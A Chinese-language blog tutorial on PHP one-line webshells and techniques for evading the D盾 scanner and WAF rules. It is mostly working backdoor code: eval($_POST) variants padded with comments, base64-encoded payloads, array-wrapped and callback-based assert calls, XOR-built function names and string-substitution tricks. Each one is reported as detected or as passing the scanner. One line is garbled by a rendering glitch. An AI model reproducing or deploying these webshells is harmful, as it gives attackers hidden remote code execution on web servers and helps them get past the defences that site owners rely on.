一句话木马以及免杀


此篇只讨论php,其实原理是相同的,本文的思路依然适用于其他语言
WAF一般都是维护一个规则库,记录webshell常用的函数、方法等等,通过这个规则库匹配从而检测是否是木马.当匹配上对应特征时就是告警,但是规则匹配肯定会有误报,waf一直告警也很烦,所以waf一般会稳定为首要目标,也会放宽一下规则,这就是绕的基础
查杀软件我首先:D盾
『D盾_防火墙』专为IIS设计的一个主动防御的保护软件,以内外保护的方式 防止网站和服务器给入侵,在正常运行各类网站的情 况下,越少的功能,服务器越安全的理念而设计!限制了常见的入侵方法,让服务器更安全
由于php7.1以后assert不能拆分了,所以此篇不使用assert函数作为核心,使用适用性更广的eval
在这里我们用最新版D盾进行查杀

首先请出我们最爱的一句话木马:

<?php @eval($_POST['1']);?>

无论如何混淆webshell,我们期望最终得到的逻辑依然是这条代码,所以答案知道了,想办法混淆就行了。
我们先看下这个的查杀吧

显然被杀了
经过对D盾的探测,可以知道,它对函数的检测其实是比较粗糙的,比如我们构造一个函数,让其返回值拼接为

<?php

function x()
{

    return $_POST['1'];

}

eval(x());
?>

虽然没被直接杀掉但是级别也换成了2级
首先,无论如何更改函数名,都会被杀掉,所以和函数名没关系,然后就是eval内的参数了,测试后发现,只要拼接成eval($_POST[‘a’])就会被杀,因此我们避免语句直接拼接为这样即可。

如何避免直接拼接呢 当然是往中间加料了 加一些既不会破坏语法又能起到隔离作用的东西,什么东西可以做到这样呢?当然就是注释了

<?php

function x()
{

    return "/*sasas23123*/".$_POST['a']."/*sdfw3123*/";

}

eval(x());
?>


可以看到已经完全绕过查杀了

既然如此,我们的核心绕过思路就是利用注释了,为了去除特征,必不可少的就是随机性了
使用函数返回值与eval拼接只是权宜之计,毕竟也是一条规则就能够被干掉的。所以我们这里使用类和构造函数来替代主动调用函数。

<?php
class x
{

        function __construct()
        {      
                @eval("/*sasas23123*/".$_POST['a']."/*sdfw3123*/");
        }

}
new x();

?>


尴尬了被查杀了这样也不行,看来eval是被重点关照的对象。
改到这里,我不禁想 如果D盾发狠把".P O S T [ ′ a ′ ] . " 当 独 立 规 则 , 那 岂 不 是 也 歇 菜 , 所 以 , 我 决 定 使 用 b a s e 64 编 码 将 " _POST['a']."当独立规则,那岂不是也歇菜,所以,我决定使用base64编码将"_POST[‘a’]"转化一下

<?php
class x
{
        public $payload = null;
        public $decode_payload = null;
        function __construct()
        {       $this->payload='ZXZhbCgkX1BPU1RbYV0pOw==';
                $this->decode_payload = @base64_decode( $this->payload );
                @eval("/*sasas23123*/".$this->decode_payload."/*sdfw3123*/");
        }

}
new x();

?>


可以看到杀到了二级也不行。
试试数组

<?php
$b = substr_replace("assexx","rt",4);
$a = array($arrayName = ($arrayName =($arrayName = array('a' => $b($_POST['x'])))));
?>

完美绕过
下面试试组合回调函数绕过

<?php 
 function zeo($c,$d){
     pj()($c,$d);
 }
 function pj(){
     return "register_shut"."down_function";
 }

 $b=$_POST['x'];
zeo(assert,$b);
?>


完美绕过
看看无字符码
没有字母,简单来说就是字母被替代了

就是用各种运算,例如异或,拼装出来想要的函数

最后能构造出a-z中任意一个字符。

然后再利用PHP允许动态函数执行的特点,

<?php
@$_++;
$__ = ("`" ^ "?") . (":" ^ "}") . ("%" ^ "`") . ("{" ^ "/");
$___ = ("$" ^ "{") . ("~" ^ ".") . ("/" ^ "`") . ("-" ^ "~") . ("(" ^ "|");
${$__}[!$_](${$___}[$_]);
?>

看来这样也不行

看看字符串变换

<?php
$a = substr_replace("xxser","asser",-3);
$aa = array('',$a);
$b = $aa[1].chr('116');
$fun=preg_replace("/xx/","",$b);
$cc = substr_replace("",$fun,0);

$cc($_POST['x']);
?>


可以看到二级也不太行
接着看下php7以下的版本
assert函数

<?php assert(@$_POST['a']); ?>

尴尬直接过了

<?php
func = $_GET["func"];
assert("$func()");


GET方法不太行
这个是我总结的webshell免杀技巧,后期有更好的绕过免杀技术再和大家分享


资源下载

鹰的故事

php一句话木马

评 论